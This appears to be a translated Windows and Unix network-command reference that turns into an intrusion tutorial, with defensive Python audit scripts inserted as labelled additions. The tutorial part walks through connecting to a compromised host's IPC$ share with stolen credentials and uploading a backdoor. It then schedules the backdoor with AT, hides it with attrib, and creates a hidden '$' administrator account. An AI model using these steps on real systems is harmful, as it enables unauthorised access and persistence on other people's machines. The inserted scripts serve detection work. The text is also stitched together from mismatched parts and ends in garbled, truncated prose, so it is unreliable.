netstat
The netstat command displays network connections, routing tables, and network interface information, so that the user can see which network connections are currently active. The general format is:
    netstat [options]
The options mean the following:
    -a  display all sockets, including listening ones
    -c  redisplay continuously, once per second, until the user interrupts it
    -i  display information on all network interfaces, in the same format as "ifconfig -e"
    -n  show numeric IP addresses instead of names
    -r  display the kernel routing table, in the same format as "route -e"
    -t  show TCP connections
    -u  show UDP connections
    -v  show work in progress

nslookup
The nslookup command queries the IP address of a machine and the domain name corresponding to an address. It normally needs a name server to provide the domain name service; if a name server is already configured, this command can be used to look up the domain names that correspond to the IP addresses of different hosts. The general format is:
    nslookup [IP address | domain name]

finger
The finger command queries user information. It usually shows the user name, home directory, idle time, login time, login shell, and other details. To query user information on a remote machine, append "@hostname" to the user name, in the form user@host; the remote host must be running the finger daemon. The general format is:
    finger [options] [user] [user@host]
The options mean the following:
    -s  display the user's login name, real name, terminal name, write status, idle time, login time, and similar information
    -l  in addition to the information shown by -s, display the user's home directory, login shell, mail status, and the contents of the .plan, .project, and .forward files in the user's home directory
    -p  the same as -l, except that the .plan and .project files are not displayed

ping
The ping command checks whether a host on the network is up: it sends an ICMP ECHO_REQUEST packet to the host. Sometimes we want to download a file from a host on the network but do not know whether that host is on; the ping command answers that question. The general format is:
    ping [options] hostname | IP address
The options mean the following:
    -c count    stop after sending the specified number of packets
    -d          set the SO_DEBUG option
    -f          send many packets to the machine as quickly as possible and watch its response
    -i seconds  set the interval between packets; the default is one packet per second
    -l count    send the specified number of packets to the machine in the fastest possible way (only the superuser may use this option)
    -q          do not display per-packet information; show only the final summary
    -r          send the packet directly to the machine without passing through a gateway; usually used to check whether the local network interface has a problem
    -s bytes    specify the number of data bytes to send; the default is 56, which together with the 8-byte ICMP header makes 64 bytes of ICMP data

NET commands
Many Windows NT network commands start with NET. These NET commands share some common properties: you can list all available NET commands by typing NET /?.
You can get syntax help for a NET command on the command line by typing NET HELP command. For example, to get help for NET ACCOUNTS, type NET HELP ACCOUNTS. All NET commands accept the options /yes and /no (abbreviated /y and /n). /y automatically answers "yes" to any interactive prompt the command produces, and /n answers "no". For example, NET STOP SERVER normally asks whether to stop all services that depend on the Server service; NET STOP SERVER /Y answers "yes" automatically and shuts down the Server service.

NET ACCOUNTS
Updates the user account database and changes the password and logon requirements for all accounts. The Net Logon service must be running on the computer whose account parameters are changed.
    net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
    net accounts [/sync] [/domain]
Parameters:
    none                         NET ACCOUNTS without parameters displays the current password settings, logon time limits, and domain information.
    /forcelogoff:{minutes | no}  Sets how long to wait before ending a user's session with the server when the user account or the valid logon hours expire. NO disables forced logoff and is the default. With /forcelogoff:minutes, Windows NT warns the user the given number of minutes before forcing them off the network; if files are open, Windows NT warns the user. If minutes is less than two, Windows NT warns the user to log off from the network immediately.
    /minpwlen:length             Sets the minimum number of characters in a user account password. The allowed range is 0-14; the default is 6.
    /maxpwage:{days | unlimited} Sets the maximum number of days a user account password remains valid. UNLIMITED sets no maximum. The /maxpwage value must be greater than /minpwage. The allowed range is 1-49,710 days (UNLIMITED).
The default is 90 days.
    /minpwage:days               Sets the minimum number of days a user must keep the original password. 0 sets no minimum. The allowed range is 0-49,710 days; the default is 0 days.
    /uniquepw:number             Requires that when a user changes the password, the same password cannot be reused until it has been changed number times. The allowed range is 0-8; the default is 5.
    /domain                      Performs the operation on the primary domain controller of the current domain; otherwise it is performed on the local computer. This parameter is only used on Windows NT Workstation computers that are members of a Windows NT Server domain; Windows NT Server computers perform the operation on the primary domain controller by default.
    /sync                        When used on the primary domain controller, synchronizes all backup domain controllers in the domain; when used on a backup domain controller, synchronizes only that backup domain controller with the primary domain controller. This command applies only to computers that are members of a Windows NT Server domain.

NET COMPUTER
Adds or deletes a computer from the domain database.
This command is only available on computers running Windows NT Server.
    net computer \\computername {/add | /del}
Parameters:
    \\computername   Specifies the computer to add to or delete from the domain.
    /add             Adds the specified computer to the domain.
    /del             Deletes the specified computer from the domain.

NET CONFIG
Displays the configurable services that are currently running, or displays and changes the settings of a service.
    net config [service [options]]
Parameters:
    none      NET CONFIG without parameters displays a list of configurable services.
    service   The service to configure with NET CONFIG (SERVER or WORKSTATION).
    options   Options specific to the service. For the full syntax, see NET CONFIG SERVER or NET CONFIG WORKSTATION.

NET CONFIG SERVER
Displays or changes the settings of the Server service while it is running.
    net config server [/autodisconnect:time] [/srvcomment:"text"] [/hidden:{yes | no}]
Parameters:
    none                  NET CONFIG SERVER without parameters displays the current configuration of the Server service.
    /autodisconnect:time  Sets the maximum time a user session may remain idle before it is disconnected. Specify -1 to keep sessions open indefinitely. The allowed range is -1 to 65535 minutes; the default is 15 minutes.
    /srvcomment:"text"    Adds a comment for the server, which the NET VIEW command shows on screen. The comment can be up to 48 characters and must be enclosed in quotation marks.
    /hidden:{yes | no}    Specifies whether the server's computer name appears in server listings. Hiding a server does not change its permissions. The default is NO.

NET CONFIG WORKSTATION
Displays or changes the settings of the Workstation service while it is running.
    net config workstation [/charcount:bytes] [/chartime:msec] [/charwait:sec]
Parameters:
    none   NET CONFIG WORKSTATION without parameters displays the current configuration of the local computer.
    /charcount:bytes   Specifies the amount of data Windows NT collects before sending it to a communication device. If /chartime:msec is also set, Windows NT acts on whichever condition is satisfied first. The allowed range is 0-65535 bytes; the default is 16 bytes.
    /chartime:msec     Specifies how long Windows NT collects data before sending it to a communication device. If /charcount:bytes is also set, Windows NT acts on whichever condition is satisfied first. The allowed range is 0-65535000 milliseconds; the default is 250 milliseconds.
    /charwait:sec      Sets how long Windows NT waits for a communication device to become available. The allowed range is 0-65535 seconds; the default is 3,600 seconds.
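The NET ACCOUNTS parameters above (minimum length, maximum age, password history) are what an administrator audits when checking a host's password policy. The following script is an added example and is not part of the original page: it parses the text that "net accounts" prints and compares the values with a set of assumed thresholds (the POLICY dictionary is this example's choice, not a Windows default). The sample output is constructed to match the defaults quoted in the text (length 6, age 90 days, history 5); on a live host the real output can be obtained with subprocess.run(["net", "accounts"], capture_output=True, text=True).stdout.

```python
"""Audit the password policy reported by NET ACCOUNTS (added example)."""
import re

# Constructed sample, laid out like the output of "net accounts" and using
# the defaults quoted in the text (minpwlen 6, maxpwage 90, uniquepw 5).
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          90
Minimum password length:                              6
Length of password history maintained:                5
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""

# Thresholds for the audit: assumed values chosen for this example.
POLICY = {
    "min_length": 12,        # shortest password we accept
    "max_age_days": 60,      # passwords older than this must expire
    "history": 8,            # NET ACCOUNTS /uniquepw allows at most 8
    "lockout_threshold": 10, # failed logons before the account locks
}


def parse_net_accounts(text):
    """Turn 'label:   value' lines into a dict of label -> value string."""
    settings = {}
    for line in text.splitlines():
        m = re.match(r"^(.*?):\s{2,}(\S.*)$", line.strip())
        if m:
            settings[m.group(1).strip()] = m.group(2).strip()
    return settings


def _as_number(value):
    """Convert a NET ACCOUNTS value to int; Never/Unlimited/None become None."""
    if value in ("Never", "Unlimited", "None"):
        return None
    return int(value)


def audit_password_policy(text, policy=POLICY):
    """Return a list of findings (strings); an empty list means the policy passes."""
    s = parse_net_accounts(text)
    findings = []

    min_len = _as_number(s["Minimum password length"])
    if min_len is None or min_len < policy["min_length"]:
        findings.append(f"minimum password length {min_len} < {policy['min_length']}")

    max_age = _as_number(s["Maximum password age (days)"])
    if max_age is None:  # "Unlimited": passwords never expire
        findings.append("maximum password age is unlimited")
    elif max_age > policy["max_age_days"]:
        findings.append(f"maximum password age {max_age} days > {policy['max_age_days']}")

    history = _as_number(s["Length of password history maintained"])
    if history is None or history < policy["history"]:
        findings.append(f"password history {history} < {policy['history']}")

    lockout = _as_number(s["Lockout threshold"])
    if lockout is None or lockout > policy["lockout_threshold"]:
        findings.append(f"lockout threshold {lockout} (want <= {policy['lockout_threshold']})")

    return findings


if __name__ == "__main__":
    for finding in audit_password_policy(SAMPLE_NET_ACCOUNTS):
        print("FINDING:", finding)
```

With the sample above the audit reports four findings: the length, age and history are below the assumed thresholds, and the lockout threshold is "Never", which the script treats as a finding because no lockout is configured.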
NET CONTINUE
Reactivates a suspended service.
    net continue service
Parameters:
    service   The service to continue. It can be one of: File Server for Macintosh (Windows NT Server only), FTP Publishing Service, LPDSVC, Net Logon, Network DDE, Network DDE DSDM, NT LM Security Support Provider, Remoteboot (Windows NT Server only), Remote Access Server, Schedule, Server, Simple TCP/IP Services, and Workstation.

NET FILE
Displays the names of all open shared files on a server and the number of file locks. This command can also close individual files and remove file locks.
    net file [id [/close]]
Parameters:
    none     NET FILE without parameters lists the open files on the server.
    id       The identification number of the file.
    /close   Closes the open file and releases the locked records. Type this command from the server where the file is shared.

NET GROUP
Adds, displays, or changes global groups in a Windows NT Server domain. This command is only available in a Windows NT Server domain.
    net group [groupname [/comment:"text"]] [/domain]
    net group groupname {/add [/comment:"text"] | /delete} [/domain]
    net group groupname username [...] {/add | /delete} [/domain]
Parameters:
    none              NET GROUP without parameters displays the server name and the names of the server's groups.
    groupname         The group to add, expand, or delete. Supply only a group name to view the list of users in the group.
    /comment:"text"   Adds a comment for a new or existing group. The comment can be up to 48 characters and must be enclosed in quotation marks.
    /domain           Performs the operation on the primary domain controller of the current domain; otherwise it is performed on the local computer. This parameter is only used on Windows NT Workstation computers that are members of a Windows NT Server domain; Windows NT Server computers perform the operation on the primary domain controller by default.
    username [...]    Lists one or more users to add to or remove from the group.
Separate multiple user names with spaces.
    /add      Adds a group, or adds user names to a group. An account must already exist for each user added to the group with this command.
    /delete   Deletes a group, or removes user names from a group.

NET HELP
Provides a list of network commands and help topics, or provides help for a specified command or topic. The available network commands are those listed in the "Command" window of the Command Reference.
    net help [command]
    net command {/help | /?}
Parameters:
    none      NET HELP without parameters displays the list of commands and help topics.
    command   The command for which help is required; do not include NET as part of command.
    /help     Displays the help text.
    /?        Displays the correct syntax of the command.

NET HELPMSG
Provides help for a Windows NT error message.
    net helpmsg message#
Parameters:
    message#   The four-digit number of the Windows NT message for which help is required.

NET LOCALGROUP
Adds, displays, or changes local groups.
    net localgroup [groupname [/comment:"text"]] [/domain]
    net localgroup groupname {/add [/comment:"text"] | /delete} [/domain]
    net localgroup groupname name [...] {/add | /delete} [/domain]
Parameters:
    none              NET LOCALGROUP without parameters displays the server name and the names of the computer's local groups.
    groupname         The local group to add, expand, or delete. Supply only groupname to view the list of users or global groups in the local group.
    /comment:"text"   Adds a comment for a new or existing group. The comment can be up to 48 characters and must be enclosed in quotation marks.
    /domain           Performs the operation on the primary domain controller of the current domain; otherwise it is performed on the local computer. This parameter applies only to Windows NT Workstation computers that are members of a Windows NT Server domain; Windows NT Server computers perform the operation on the primary domain controller by default.
    name [...]        Lists one or more user names or group names to add to or remove from the local group, separated by spaces. They can be local users, users from other domains, or global groups, but not other local groups. For a user from another domain, prefix the user name with the domain name (for example, SALES\RALPHR).
    /add              Adds a global group name or user name to a local group. An account must already exist for the user or global group before it can be added to a local group with this command.
    /delete           Removes a group name or user name from the local group.
NET NAME
Adds or deletes a messaging name (sometimes called an alias), or displays the list of names for which the computer accepts messages. The Messenger service must be running on the computer to use NET NAME.
    net name [name [/add | /delete]]
Parameters:
    none      NET NAME without parameters lists the names currently in use.
    name      Specifies the name that receives messages. The name can be up to 15 characters.
    /add      Adds the name to the computer. /add is optional: typing NET NAME name is the same as typing NET NAME name /add.
    /delete   Removes the name from the computer.
NET PAUSE
Suspends a running service.
    net pause service
Parameters:
    service   One of the following services: File Server for Macintosh (Windows NT Server only), FTP Publishing Service, LPDSVC, Net Logon, Network DDE, Network DDE DSDM, NT LM Security Support Provider, Remoteboot (Windows NT Server only), Remote Access Server, Schedule, Server, Simple TCP/IP Services, or Workstation.

NET PRINT
Displays or controls print jobs and print queues.
    net print \\computername\sharename
    net print [\\computername] job# [/hold | /release | /delete]
Parameters:
    computername   The name of the computer sharing the printer queue.
    sharename      The name of the print queue. When both computername and sharename are given, separate them with a backslash (\).
    job#           The identification number assigned to a print job in a printer queue. A computer with one or more printer queues assigns a unique identification number to each print job. A job number in use on one shared printer queue is not assigned to any other job, nor to a job in another printer queue.
    /hold          When used with job#, holds the print job waiting in the printer queue. The job stays in the queue, and other jobs cannot pass it until it is released.
    /release       Releases a held print job.
    /delete        Removes a print job from the printer queue.

NET SEND
Sends messages to other users, computers, or messaging names on the network. The Messenger service must be running to receive messages.
    net send {name | * | /domain[:name] | /users} message
Parameters:
    name             The user name, computer name, or messaging name to which the message is sent. If the computer name contains blank characters, enclose it in quotation marks ("").
    *                Sends the message to all names in the group.
    /domain[:name]   Sends the message to all names in the computer's domain. If name is specified, the message is sent to all names in the specified domain or group.
    /users           Sends the message to all users connected to the server.
    message          The text to send as a message.
NET SESSION
Lists or disconnects sessions between the local computer and the clients connected to it.
    net session [\\computername] [/delete]
Parameters:
    none             NET SESSION without parameters displays all sessions with the local computer.
    \\computername   Identifies the computer whose session is to be listed or disconnected.
    /delete          Ends the session with \\computername and closes all files opened on this computer during that session. If \\computername is omitted, all sessions with the local computer are cancelled.

NET SHARE
Creates, deletes, or displays shared resources.
    net share sharename
    net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]
    net share sharename [/users:number | /unlimited] [/remark:"text"]
    net share {sharename | drive:path} /delete
Parameters:
    none             NET SHARE without parameters displays information about all resources shared on the local computer.
    sharename        The network name of the shared resource. Typing NET SHARE with only a sharename displays information about that share.
    drive:path       Specifies the absolute path of the directory to be shared.
    /users:number    Sets the maximum number of users who can simultaneously access the shared resource.
    /unlimited       Does not limit the number of users who can simultaneously access the shared resource.
    /remark:"text"   Adds a descriptive comment about the resource; enclose the text in quotation marks.
    /delete          Stops sharing the resource.

NET START
Starts a service, or displays a list of started services. If a service name contains two or more words, such as Net Logon or Computer Browser, enclose it in quotation marks (").
    net start [service]
Parameters:
    none      NET START without parameters displays a list of running services.
    service   One of the following services: Alerter, Client Service for NetWare, Clipbook Server, Computer Browser, DHCP Client, Directory Replicator, Eventlog, FTP Publishing Service, LPDSVC, Messenger, Net Logon, Network DDE, Network DDE DSDM, Network Monitoring Agent, NT LM Security Support Provider, OLE, Remote Access Connection Manager, Remote Access ISNSAP Service, Remote Access Server, Remote Procedure Call (RPC) Locator, Remote Procedure Call (RPC) Service, Schedule, Server, Simple TCP/IP Services, SNMP, Spooler, TCP/IP NetBIOS Helper, UPS, and Workstation. The following services are available only on Windows NT Server: File Server for Macintosh, Gateway Service for NetWare, Microsoft DHCP Server, Print Server for Macintosh, Remoteboot, Windows Internet Name Service.

NET STATISTICS
Displays the statistics log for the local Workstation or Server service.
    net statistics [workstation | server]
Parameters:
    none          NET STATISTICS without parameters lists the running services for which statistics are available.
    workstation   Displays statistics for the local Workstation service.
    server        Displays statistics for the local Server service.

NET STOP
Stops a Windows NT network service.
    net stop service
Parameters:
    service   One of the following services: Alerter, Client Service for NetWare, Clipbook Server, Computer Browser, Directory Replicator, FTP Publishing Service, LPDSVC, Messenger, Net Logon, Network DDE, Network DDE DSDM, Network Monitor Agent, NT LM Security Support Provider, OLE (Object Linking and Embedding), Remote Access Connection Manager, Remote Access ISNSAP Service, Remote Access Server, Remote Procedure Call (RPC) Locator, Remote Procedure Call (RPC) Service, Schedule, Server, Simple TCP/IP Services, SNMP, Spooler, TCP/IP NetBIOS Helper, UPS, and Workstation. The following services are available only on Windows NT Server: File Server for Macintosh, Gateway Service for NetWare, Microsoft DHCP Server, Print Server for Macintosh, Remoteboot, Windows Internet Name Service.

NET TIME
Synchronizes the computer's clock with that of another computer or domain. When used without the /set parameter, it displays the time of the other computer or domain.
    net time [\\computername | /domain[:name]] [/set]
Parameters:
    \\computername   The name of the server whose time is to be checked or synchronized with.
    /domain[:name]   Specifies the domain with whose time to synchronize.
    /set             Synchronizes this computer's clock with the clock of the specified computer or domain.

NET USE
Connects a computer to a shared resource or disconnects it from one, or displays information about the computer's connections. This command also controls persistent network connections.
    net use [devicename | *] [\\computername\sharename[\volume]] [password | *] [/user:[domainname\]username] [[/delete] | [/persistent:{yes | no}]]
    net use devicename [/home[password | *]] [/delete:{yes | no}]
    net use [/persistent:{yes | no}]
Parameters:
    none                       NET USE without parameters lists the network connections.
    devicename                 Specifies the name of the resource to connect to, or the name of the device to disconnect. There are two kinds of device names: disk drives (D: through Z:) and printers (LPT1: through LPT3:). Type an asterisk instead of a specific device name to have the next available device name assigned.
    \\computername\sharename   The name of the server and of the shared resource. If the computer name contains blank characters, enclose the double backslash (\\) and the computer name in quotation marks (""). The computer name can be 1 to 15 characters long.
    \volume                    Specifies a NetWare volume on the server. To connect to NetWare servers, Client Services for NetWare (Windows NT Workstation) must be installed and running.
    password                   The password needed to access the shared resource.
    *                          Prompts for the password. The password is not displayed when typed at the password prompt.
    /user                      Specifies a different user name with which to make the connection.
    domainname                 Specifies another domain. For example, NET USE D: \\SERVER\SHARE /USER:ADMIN\MARIEL connects user Mariel as if the connection were made from the ADMIN domain. If the domain is omitted, the current logged-on domain is used.
    username                   Specifies the user name with which to log on.
    /home                      Connects a user to their home directory.
    /delete                    Cancels the specified network connection. If the connection is specified with an asterisk, all network connections are cancelled.
    /persistent                Controls the use of persistent network connections. The default is the setting used last. Deviceless connections are not persistent. YES saves all connections as they are made and restores them at the next logon. NO does not save the connection being made or subsequent connections; existing connections are restored at the next logon. Use the /delete switch to remove persistent connections.

NET USER
Adds or changes user accounts, or displays user account information.
    net user [username [password | *] [options]]
    net user username {password | *} /add [options] [/domain]
    net user username [/delete] [/domain]
Parameters:
    none       NET USER without parameters lists the user accounts on the computer.
    username   The name of the user account to add, delete, change, or view. User account names can be up to 20 characters.
    password   Assigns or changes a password for the user account. The password must satisfy the minimum length set with the /minpwlen option of the NET ACCOUNTS command. It can be up to 14 characters.

DIR
Displays all folders and files in the current directory. A common use in this context: after uploading a backdoor or server program (say it is named systems.exe) to C:\Winnt\System32 on the compromised host (the "broiler"), you want to check whether the upload succeeded. The DIR command does that:
    dir c:\winnt\system32\systems.exe
The output is:
    2004-05-24  20:06           194,762 systems.exe
                   1 file(s)        194,762 bytes
                   0 dir(s)   4,658,597,888 bytes free
If the upload did not succeed, the output is:
    Volume in drive C has no label.
    Volume Serial Number is 6458-3DB8
    Directory of c:\winnt\system32
    File Not Found
CD
Changes the current directory. Look at the following commands:
    c:\> cd winnt                 // enter the Winnt folder
    C:\Winnt> cd system32         // enter the System32 folder
    C:\Winnt\System32> cd ..      // go back to the previous directory
    C:\Winnt> cd ..
    C:\> d:                       // switch to the D drive
    D:\> e:                       // switch to the E drive
    E:\>
DEL and DELTREE
DEL deletes files. Look at the following commands:
    C:\> del c:\xx\ww.txt     // delete the file ww.txt in the XX directory of the C drive
    C:\> del c:\xx\*.*        // delete all files in the XX directory of the C drive
DELTREE is more destructive: it deletes not only all the files but also the folder itself:
    C:\> deltree c:\winnt     // delete the winnt folder from the root of C:\
Be careful with this one.
ATTRIB
Displays and changes file or folder attributes. The attributes are Hidden (letter H), Read-only (R), Archive (A), and System (S). To change an attribute, "+" adds it and "-" removes it. We usually put the uploaded backdoor or server program under C:\Winnt\System32; once in the broiler's cmd, to keep its administrator from noticing, we can hide the uploaded file. For example, for systems.exe the commands are:
    c:\> attrib +h c:\winnt\system32\systems.exe    // systems.exe can no longer be seen in System32
    c:\> attrib -h c:\winnt\system32\systems.exe    // remove the hidden attribute from systems.exe

COPY
Copies one or more files to another directory. For example, to copy the file 1.txt in the root of C: to the VV folder on the D drive:
    C:\> copy c:\1.txt d:\vv\1.exe
For example, once you have established an IPC$ connection (how to connect is explained below) and the broiler's D drive is shared, you can copy a backdoor or server program systems.exe from the root of your C drive to the broiler's D drive with:
    C:\> copy c:\systems.exe \\broiler IP\d$
NET USE
Once you have the broiler's user name and password, NET USE can establish an IPC$ connection:
    net use \\broiler IP\ipc$ "password" /user:"user name"
After the connection succeeds, upload the backdoor or server program (say it is called systems.exe and sits in the root of your D drive):
    copy d:\systems.exe \\broiler IP\c$     // this only works if the share is open; otherwise the upload fails
    net time \\broiler IP                   // shows the broiler's time, in 24-hour format; for example 3:10 pm is written 15:10
    at \\broiler IP 15:12 systems.exe       // run systems.exe at 15:12
If what you uploaded is a reverse-connecting trojan, you can now wait for it to connect back to you. In practice many things go wrong. For example, the IPC$ connection above may succeed, yet NET TIME \\broiler IP must also work so that you can see the broiler's time; even if it does, the AT service on the broiler is sometimes not running; and even when it is, the backdoor or server program does not necessarily get a chance to run, since antivirus software may kill it. So failure during an intrusion is common. When this method does not work, try another.
NET USER
Lists users or creates a new user. Here is a screenshot from my computer:
    C:\> net user
    User accounts for \\BILLGATES
    -------------------------------------------------------------------------------
    Guest                    Guest1                   HelpAssistant
    SUPPORT_388945a0         YHKJ
    The command completed successfully.
    C:\>
Those are all my users. Now I create a new user setwell with the password 123456; the screenshot is as follows:
    C:\> net user setwell 123456 /add
    The command completed successfully.
    C:\> net localgroup administrators setwell /add    // adds setwell to the Administrators group
    The command completed successfully.
Next we list the users again; the picture is as follows:
    C:\> net user
    User accounts for \\BILLGATES
    -------------------------------------------------------------------------------
    Guest                    Guest1                   HelpAssistant
    Setwell                  SUPPORT_388945a0         YHKJ
    The command completed successfully.
A user created with NET USER can be hidden by adding $ to the name. Create a user this way and the screenshot is as follows:
    C:\> net user set$ 123456 /add
    The command completed successfully.
    C:\> net localgroup administrators set$ /add
    The command completed successfully.
    C:\> net user
    User accounts for \\BILLGATES
    -------------------------------------------------------------------------------
    Guest                    Guest1                   HelpAssistant
    Setwell                  SUPPORT_388945a0         YHKJ
    The command completed successfully.
    C:\>
See? The user set$ does not appear. You can use the command net localgroup administrators instead, which shows all administrators; the screenshot is as follows:
    C:\> net localgroup administrators
    Alias name     administrators
    Comment        Administrators have complete and unrestricted access to the computer/domain
    Members
    -------------------------------------------------------------------------------
    Guest1
    set$
    setwell
    yhkj
    The command completed successfully.
    C:\>
There it is: now we see the user set$.
To delete the user, use this command:
    C:\> net user setwell /delete
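The screenshots above show why an administrator should not rely on "net user" alone: an account with a "$" suffix is missing from that listing but still shows up in "net localgroup administrators". The following script is an added example and is not part of the original page. It parses both outputs and reports every member of Administrators that either carries the "$" suffix or does not appear in the NET USER listing. The two samples are constructed from the screenshots in the text; on a live host they would be replaced by the output of subprocess.run(["net", "user"], capture_output=True, text=True).stdout and the corresponding "net localgroup administrators" call.

```python
"""Report local Administrators hidden from NET USER (added example)."""

# Constructed sample of "net user" output: the set$ account is not listed.
SAMPLE_NET_USER = """\
User accounts for \\\\BILLGATES

-------------------------------------------------------------------------------
Guest                    Guest1                   HelpAssistant
Setwell                  SUPPORT_388945a0         YHKJ
The command completed successfully.
"""

# Constructed sample of "net localgroup administrators" output.
SAMPLE_NET_LOCALGROUP = """\
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Guest1
set$
setwell
yhkj
The command completed successfully.
"""


def parse_names(text):
    """Return the names listed between the dashed rule and the closing
    'The command completed successfully.' line, lower-cased, as a set.
    NET USER prints several names per line and NET LOCALGROUP one per line,
    but both use this layout, so a single parser serves both."""
    names = set()
    in_list = False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("---"):
            in_list = True
            continue
        if stripped.startswith("The command completed"):
            break
        if in_list and stripped:
            # Columns are separated by runs of spaces; account names contain none.
            names.update(name.lower() for name in stripped.split())
    return names


def suspicious_admins(net_user_text, net_localgroup_text):
    """Administrators that use a '$' suffix or are absent from NET USER.

    Returns a sorted list of (name, reason) tuples; empty means nothing found."""
    users = parse_names(net_user_text)
    admins = parse_names(net_localgroup_text)
    findings = []
    for admin in sorted(admins):
        if admin.endswith("$"):
            findings.append((admin, "name ends with '$' (hidden-style account)"))
        elif admin not in users:
            findings.append((admin, "member of Administrators but not listed by NET USER"))
    return findings


if __name__ == "__main__":
    for name, reason in suspicious_admins(SAMPLE_NET_USER, SAMPLE_NET_LOCALGROUP):
        print(f"{name}: {reason}")
```

Comparing the two listings rather than looking for "$" alone matters because the suffix is only one way to make an account inconspicuous; any administrator the user listing does not account for deserves a look.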
NET START
1. Starts a service, for example:
    net start telnet    // start the Telnet service
2. Shows what is currently started. Here are the services started on my computer:
    C:\> net start
    These Windows services are started:
       Automatic Updates
       COM+ Event System
       Cryptographic Services
       DHCP Client
       Distributed Link Tracking Client
       DNS Client
       Error Reporting Service
       Event Log
       Help and Support
       IPSEC Services
       Logical Disk Manager
       Messenger
This is only part of the list.
NET SHARE
Shows the default shares, that is, C$, D$, E$, F$, ADMIN$ and IPC$, which the system creates by default. Mine are all turned off, so this screenshot was taken on a broiler:
    C:\Documents and Settings\Administrator> net share
    D$           D:\                             Default share
    F$           F:\                             Default share
    ADMIN$       C:\Winnt                        Remote Admin
    C$           C:\                             Default share
    E$           E:\                             Default share
    The command completed successfully.
    C:\Documents and Settings\Administrator>
On this broiler the IPC$ share is turned off.
NET VIEW
Also shows shares, but not the default shares above. Another screenshot, again from a broiler:
    C:\Documents and Settings\Administrator> net view
    Server Name            Remark
    -------------------------------------------------------------------------------
    \\17
    \\HMZ
    \\ZGH
    The command completed successfully.
    C:\Documents and Settings\Administrator>
Learning DOS commands may seem a little tedious, but it is actually very easy, and once learned they play an important role in an intrusion. Next time: netstat and other commands.
NETSTAT -AN
This command shows all the connections of the local machine. Look at the screenshot from my computer:
    D:\> netstat -an
    Active Connections
      Proto  Local Address          Foreign Address        State
      TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
      TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
      TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING
      TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
      TCP    180.254.158.42:139     0.0.0.0:0              LISTENING
      TCP    218.95.49.187:2935     218.89.0.231:80        ESTABLISHED
      UDP    0.0.0.0:500            *:*
      UDP    0.0.0.0:1035           *:*
      UDP    0.0.0.0:1037           *:*
      UDP    0.0.0.0:1134           *:*
      UDP    0.0.0.0:1136           *:*
The columns mean:
    Proto             protocol
    Local Address     local IP address and port
    Foreign Address   remote IP address and port
    State             connection state
LISTENING means the port is waiting for the other side to connect.
ESTABLISHED means a connection is in progress.
TCP means the TCP protocol; UDP means the UDP protocol.
The line
    TCP    218.95.49.187:2935     218.89.0.231:80        ESTABLISHED
means that, over TCP, the local IP 218.95.49.187 is connected from its port 2935 to port 80 of the remote IP 218.89.0.231.
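To turn the column explanation above into something an administrator can run over a whole "netstat -an" listing, the following script is an added example and is not part of the original page. It parses each TCP/UDP line into a record, lists the TCP ports that are listening on every interface (local address 0.0.0.0, so reachable from any network the host is attached to) and lists the established connections with their remote peer. The sample is constructed to match the screenshot in the text; on a live Windows host the real output can be obtained with subprocess.run(["netstat", "-an"], capture_output=True, text=True).stdout.

```python
"""Parse "netstat -an" output and summarise exposure (added example)."""
from collections import namedtuple

Conn = namedtuple("Conn", "proto local_ip local_port remote_ip remote_port state")

# Constructed sample, laid out like the "netstat -an" screenshot in the text.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    180.254.158.42:139     0.0.0.0:0              LISTENING
  TCP    218.95.49.187:2935     218.89.0.231:80        ESTABLISHED
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1035           *:*
"""


def _split_endpoint(endpoint):
    """'1.2.3.4:80' -> ('1.2.3.4', 80); '*:*' -> ('*', None).
    The port follows the last colon, which also works for '[::]:135'."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Return a list of Conn records, one per TCP or UDP line."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # title, header or blank line
        local_ip, local_port = _split_endpoint(parts[1])
        remote_ip, remote_port = _split_endpoint(parts[2])
        state = parts[3] if len(parts) > 3 else ""  # UDP lines carry no state
        conns.append(Conn(parts[0], local_ip, local_port, remote_ip, remote_port, state))
    return conns


def exposed_listeners(conns):
    """Sorted TCP ports in LISTENING state bound to all interfaces (0.0.0.0 or ::),
    i.e. reachable from every network the host is attached to."""
    return sorted(c.local_port for c in conns
                  if c.proto == "TCP" and c.state == "LISTENING"
                  and c.local_ip in ("0.0.0.0", "::", "[::]"))


def established_peers(conns):
    """(local_port, remote_ip, remote_port) for every ESTABLISHED connection."""
    return [(c.local_port, c.remote_ip, c.remote_port)
            for c in conns if c.state == "ESTABLISHED"]


if __name__ == "__main__":
    records = parse_netstat(SAMPLE_NETSTAT)
    print("listening on all interfaces:", exposed_listeners(records))
    print("established:", established_peers(records))
```

On the sample, port 139 is not reported as exposed because it is bound to one specific address rather than 0.0.0.0; the four RPC-style listeners on 0.0.0.0 are, and the single established connection is the one the text explains.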
Query This command is only open 3389 port (not necessarily a port is 3389, saying that it can be changed to other ports. Strictly speaking is a machine that opens a remote terminal service) can be used. I use 1 $ username I got a 3389 machine and saw the screenshot:
C:\>query user
 USERNAME              SESSIONNAME        ID  STATE
 administrator         console             0  Active
 1$                    rdp-tcp#2           1  Active
As you can see above, the administrator is logged on as well. To log a session off, use the following command:
logoff ID, which here is logoff 1.
1. ping
